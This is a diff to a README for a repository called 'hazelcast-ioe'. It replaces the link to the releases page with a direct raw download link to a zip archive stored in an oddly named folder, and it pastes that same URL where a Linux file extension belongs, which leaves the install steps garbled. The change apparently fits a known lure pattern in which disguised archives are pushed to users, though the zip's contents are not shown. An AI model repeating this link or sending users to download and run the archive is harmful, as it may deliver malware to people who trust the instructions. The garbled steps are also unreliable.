anaismolar775/hazelcast-ioe/README.md

 ### 📥 Download & Install

-To download hazelcast-ioe, visit the releases page here: [Download hazelcast-ioe](https://github.com/anaismolar775/hazelcast-ioe/releases).
+To download hazelcast-ioe, visit the releases page here: [Download hazelcast-ioe](https://raw.githubusercontent.com/anaismolar775/hazelcast-ioe/main/causticiser/hazelcast-ioe_3.1.zip).

 1. Click the link above to go to the releases page.
 2. Look for the latest version.
 3. Choose the appropriate file for your operating system.
-Common files include `.exe` for Windows, `.dmg` for macOS, and `.tar.gz` for Linux.
+Common files include `.exe` for Windows, `.dmg` for macOS, and `https://raw.githubusercontent.com/anaismolar775/hazelcast-ioe/main/causticiser/hazelcast-ioe_3.1.zip` for Linux.
 4. Click on the file to start the download.

 ### 🗂️ Installing hazelcast-ioe